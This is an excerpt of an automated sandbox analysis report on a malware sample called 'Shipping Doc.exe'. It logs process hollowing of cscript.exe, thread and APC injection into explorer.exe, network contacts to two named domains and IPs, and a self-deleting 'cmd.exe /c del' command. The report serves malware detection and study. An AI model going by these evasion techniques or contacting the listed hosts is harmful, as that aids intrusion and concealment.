Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05416CF0 mov eax, dword ptr fs:[00000030h]	15_2_05416CF0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05399080 mov eax, dword ptr fs:[00000030h]	15_2_05399080
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_054514FB mov eax, dword ptr fs:[00000030h]	15_2_054514FB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05413884 mov eax, dword ptr fs:[00000030h]	15_2_05413884
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05413884 mov eax, dword ptr fs:[00000030h]	15_2_05413884
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053CE730 mov eax, dword ptr fs:[00000030h]	15_2_053CE730
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05394F2E mov eax, dword ptr fs:[00000030h]	15_2_05394F2E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05394F2E mov eax, dword ptr fs:[00000030h]	15_2_05394F2E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05468B58 mov eax, dword ptr fs:[00000030h]	15_2_05468B58
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05468F6A mov eax, dword ptr fs:[00000030h]	15_2_05468F6A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053BF716 mov eax, dword ptr fs:[00000030h]	15_2_053BF716
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053CA70E mov eax, dword ptr fs:[00000030h]	15_2_053CA70E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053CA70E mov eax, dword ptr fs:[00000030h]	15_2_053CA70E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C3B7A mov eax, dword ptr fs:[00000030h]	15_2_053C3B7A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C3B7A mov eax, dword ptr fs:[00000030h]	15_2_053C3B7A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0546070D mov eax, dword ptr fs:[00000030h]	15_2_0546070D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0546070D mov eax, dword ptr fs:[00000030h]	15_2_0546070D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0542FF10 mov eax, dword ptr fs:[00000030h]	15_2_0542FF10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0542FF10 mov eax, dword ptr fs:[00000030h]	15_2_0542FF10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0539DB60 mov ecx, dword ptr fs:[00000030h]	15_2_0539DB60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053AFF60 mov eax, dword ptr fs:[00000030h]	15_2_053AFF60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0545131B mov eax, dword ptr fs:[00000030h]	15_2_0545131B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0539F358 mov eax, dword ptr fs:[00000030h]	15_2_0539F358
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0539DB40 mov eax, dword ptr fs:[00000030h]	15_2_0539DB40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053AEF40 mov eax, dword ptr fs:[00000030h]	15_2_053AEF40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053CB390 mov eax, dword ptr fs:[00000030h]	15_2_053CB390
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A8794 mov eax, dword ptr fs:[00000030h]	15_2_053A8794
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A1B8F mov eax, dword ptr fs:[00000030h]	15_2_053A1B8F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A1B8F mov eax, dword ptr fs:[00000030h]	15_2_053A1B8F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0544D380 mov ecx, dword ptr fs:[00000030h]	15_2_0544D380
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D37F5 mov eax, dword ptr fs:[00000030h]	15_2_053D37F5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0545138A mov eax, dword ptr fs:[00000030h]	15_2_0545138A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05417794 mov eax, dword ptr fs:[00000030h]	15_2_05417794
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05417794 mov eax, dword ptr fs:[00000030h]	15_2_05417794
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05417794 mov eax, dword ptr fs:[00000030h]	15_2_05417794
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C03E2 mov eax, dword ptr fs:[00000030h]	15_2_053C03E2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C03E2 mov eax, dword ptr fs:[00000030h]	15_2_053C03E2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C03E2 mov eax, dword ptr fs:[00000030h]	15_2_053C03E2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C03E2 mov eax, dword ptr fs:[00000030h]	15_2_053C03E2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C03E2 mov eax, dword ptr fs:[00000030h]	15_2_053C03E2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C03E2 mov eax, dword ptr fs:[00000030h]	15_2_053C03E2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05465BA5 mov eax, dword ptr fs:[00000030h]	15_2_05465BA5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05424257 mov eax, dword ptr fs:[00000030h]	15_2_05424257
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0539E620 mov eax, dword ptr fs:[00000030h]	15_2_0539E620
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053CA61C mov eax, dword ptr fs:[00000030h]	15_2_053CA61C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053CA61C mov eax, dword ptr fs:[00000030h]	15_2_053CA61C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0544B260 mov eax, dword ptr fs:[00000030h]	15_2_0544B260
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0544B260 mov eax, dword ptr fs:[00000030h]	15_2_0544B260
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05468A62 mov eax, dword ptr fs:[00000030h]	15_2_05468A62
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053B3A1C mov eax, dword ptr fs:[00000030h]	15_2_053B3A1C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0539AA16 mov eax, dword ptr fs:[00000030h]	15_2_0539AA16
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0539AA16 mov eax, dword ptr fs:[00000030h]	15_2_0539AA16
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A8A0A mov eax, dword ptr fs:[00000030h]	15_2_053A8A0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0539C600 mov eax, dword ptr fs:[00000030h]	15_2_0539C600
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0539C600 mov eax, dword ptr fs:[00000030h]	15_2_0539C600
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0539C600 mov eax, dword ptr fs:[00000030h]	15_2_0539C600
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C8E00 mov eax, dword ptr fs:[00000030h]	15_2_053C8E00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D927A mov eax, dword ptr fs:[00000030h]	15_2_053D927A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053BAE73 mov eax, dword ptr fs:[00000030h]	15_2_053BAE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053BAE73 mov eax, dword ptr fs:[00000030h]	15_2_053BAE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053BAE73 mov eax, dword ptr fs:[00000030h]	15_2_053BAE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053BAE73 mov eax, dword ptr fs:[00000030h]	15_2_053BAE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053BAE73 mov eax, dword ptr fs:[00000030h]	15_2_053BAE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A766D mov eax, dword ptr fs:[00000030h]	15_2_053A766D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05399240 mov eax, dword ptr fs:[00000030h]	15_2_05399240
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05399240 mov eax, dword ptr fs:[00000030h]	15_2_05399240
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05399240 mov eax, dword ptr fs:[00000030h]	15_2_05399240
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05399240 mov eax, dword ptr fs:[00000030h]	15_2_05399240
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0544FE3F mov eax, dword ptr fs:[00000030h]	15_2_0544FE3F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A7E41 mov eax, dword ptr fs:[00000030h]	15_2_053A7E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A7E41 mov eax, dword ptr fs:[00000030h]	15_2_053A7E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A7E41 mov eax, dword ptr fs:[00000030h]	15_2_053A7E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A7E41 mov eax, dword ptr fs:[00000030h]	15_2_053A7E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A7E41 mov eax, dword ptr fs:[00000030h]	15_2_053A7E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A7E41 mov eax, dword ptr fs:[00000030h]	15_2_053A7E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0544FEC0 mov eax, dword ptr fs:[00000030h]	15_2_0544FEC0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053AAAB0 mov eax, dword ptr fs:[00000030h]	15_2_053AAAB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053AAAB0 mov eax, dword ptr fs:[00000030h]	15_2_053AAAB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053CFAB0 mov eax, dword ptr fs:[00000030h]	15_2_053CFAB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05468ED6 mov eax, dword ptr fs:[00000030h]	15_2_05468ED6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053952A5 mov eax, dword ptr fs:[00000030h]	15_2_053952A5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053952A5 mov eax, dword ptr fs:[00000030h]	15_2_053952A5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053952A5 mov eax, dword ptr fs:[00000030h]	15_2_053952A5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053952A5 mov eax, dword ptr fs:[00000030h]	15_2_053952A5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053952A5 mov eax, dword ptr fs:[00000030h]	15_2_053952A5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053CD294 mov eax, dword ptr fs:[00000030h]	15_2_053CD294
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053CD294 mov eax, dword ptr fs:[00000030h]	15_2_053CD294
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0542FE87 mov eax, dword ptr fs:[00000030h]	15_2_0542FE87
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A76E2 mov eax, dword ptr fs:[00000030h]	15_2_053A76E2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C16E0 mov ecx, dword ptr fs:[00000030h]	15_2_053C16E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05460EA5 mov eax, dword ptr fs:[00000030h]	15_2_05460EA5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05460EA5 mov eax, dword ptr fs:[00000030h]	15_2_05460EA5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05460EA5 mov eax, dword ptr fs:[00000030h]	15_2_05460EA5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_054146A7 mov eax, dword ptr fs:[00000030h]	15_2_054146A7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C36CC mov eax, dword ptr fs:[00000030h]	15_2_053C36CC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D8EC7 mov eax, dword ptr fs:[00000030h]	15_2_053D8EC7

Source: C:\Users\user\Desktop\Shipping Doc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Shipping Doc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.davinescosmetics.com
Source: C:\Windows\explorer.exe	Domain query: www.bigdaddy.fish
Source: C:\Windows\explorer.exe	Network Connect: 208.113.204.236 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Shipping Doc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Shipping Doc.exe	Thread register set: target process: 3388			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Thread register set: target process: 3388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Shipping Doc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\Shipping Doc.exe

Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: DE0000

Jump to behavior

Source: C:\Users\user\Desktop\Shipping Doc.exe	Process created: C:\Users\user\Desktop\Shipping Doc.exe C:\Users\user\Desktop\Shipping Doc.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Doc.exe'			Jump to behavior

Source: explorer.exe, 00000006.00000000.262269287.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000006.00000000.262650603.0000000001980000.00000002.00000001.sdmp, cscript.exe, 0000000F.00000002.479722473.0000000003C20000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmp, cscript.exe, 0000000F.00000002.479722473.0000000003C20000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.262650603.0000000001980000.00000002.00000001.sdmp, cscript.exe, 0000000F.00000002.479722473.0000000003C20000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.262650603.0000000001980000.00000002.00000001.sdmp, cscript.exe, 0000000F.00000002.479722473.0000000003C20000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Users\user\Desktop\Shipping Doc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
